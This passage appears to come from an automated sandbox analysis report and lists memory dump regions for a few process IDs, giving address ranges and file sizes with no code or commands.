                                                                                    • memory/1776-230-0x0000014C1B130000-0x0000014C1B138000-memory.dmp

                                                                                      Filesize

                                                                                      32KB

                                                                                    • memory/3768-94-0x000002576BEA0000-0x000002576BEC2000-memory.dmp

                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/3780-83-0x00007FFE942E0000-0x00007FFE942F9000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3780-300-0x00007FFE84E20000-0x00007FFE84EED000-memory.dmp

                                                                                      Filesize

                                                                                      820KB

                                                                                    • memory/3780-128-0x00007FFE93EF0000-0x00007FFE93F09000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3780-95-0x00007FFE94020000-0x00007FFE94043000-memory.dmp

                                                                                      Filesize

                                                                                      140KB

                                                                                    • memory/3780-74-0x000001AB1DC70000-0x000001AB1E190000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/3780-75-0x00007FFE84900000-0x00007FFE84E20000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/3780-78-0x00007FFE99760000-0x00007FFE99774000-memory.dmp

                                                                                      Filesize

                                                                                      80KB

                                                                                    • memory/3780-31-0x00007FFE97AD0000-0x00007FFE97AF3000-memory.dmp

                                                                                      Filesize

                                                                                      140KB

                                                                                    • memory/3780-84-0x00007FFE85630000-0x00007FFE8574C000-memory.dmp

                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/3780-81-0x00007FFE94420000-0x00007FFE9442D000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/3780-76-0x00007FFE97AD0000-0x00007FFE97AF3000-memory.dmp

                                                                                      Filesize

                                                                                      140KB

                                                                                    • memory/3780-50-0x00007FFE9D040000-0x00007FFE9D04F000-memory.dmp

                                                                                      Filesize

                                                                                      60KB

                                                                                    • memory/3780-244-0x00007FFE8B560000-0x00007FFE8B593000-memory.dmp

                                                                                      Filesize

                                                                                      204KB

                                                                                    • memory/3780-26-0x00007FFE93890000-0x00007FFE93E79000-memory.dmp

                                                                                      Filesize

                                                                                      5.9MB

                                                                                    • memory/3780-301-0x000001AB1DC70000-0x000001AB1E190000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/3780-112-0x00007FFE84EF0000-0x00007FFE85067000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/3780-304-0x00007FFE84900000-0x00007FFE84E20000-memory.dmp

                                                                                      Filesize

                                                                                      5.1MB

                                                                                    • memory/3780-72-0x00007FFE93890000-0x00007FFE93E79000-memory.dmp

                                                                                      Filesize

                                                                                      5.9MB

                                                                                    • memory/3780-73-0x00007FFE84E20000-0x00007FFE84EED000-memory.dmp

                                                                                      Filesize

                                                                                      820KB

                                                                                    • memory/3780-68-0x00007FFE8B560000-0x00007FFE8B593000-memory.dmp

                                                                                      Filesize

                                                                                      204KB

                                                                                    • memory/3780-66-0x00007FFE94180000-0x00007FFE9418D000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/3780-64-0x00007FFE93EF0000-0x00007FFE93F09000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3780-62-0x00007FFE84EF0000-0x00007FFE85067000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/3780-60-0x00007FFE94020000-0x00007FFE94043000-memory.dmp

                                                                                      Filesize

                                                                                      140KB

                                                                                    • memory/3780-329-0x00007FFE84EF0000-0x00007FFE85067000-memory.dmp

                                                                                      Filesize

                                                                                      1.5MB

                                                                                    • memory/3780-338-0x00007FFE85630000-0x00007FFE8574C000-memory.dmp

                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/3780-323-0x00007FFE93890000-0x00007FFE93E79000-memory.dmp

                                                                                      Filesize

                                                                                      5.9MB

                                                                                    • memory/3780-324-0x00007FFE97AD0000-0x00007FFE97AF3000-memory.dmp

                                                                                      Filesize

                                                                                      140KB

                                                                                    • memory/3780-58-0x00007FFE942E0000-0x00007FFE942F9000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3780-56-0x00007FFE94340000-0x00007FFE9436D000-memory.dmp

                                                                                      Filesize

                                                                                      180KB

                                                                                    • memory/3780-353-0x00007FFE93890000-0x00007FFE93E79000-memory.dmp

                                                                                      Filesize

                                                                                      5.9MB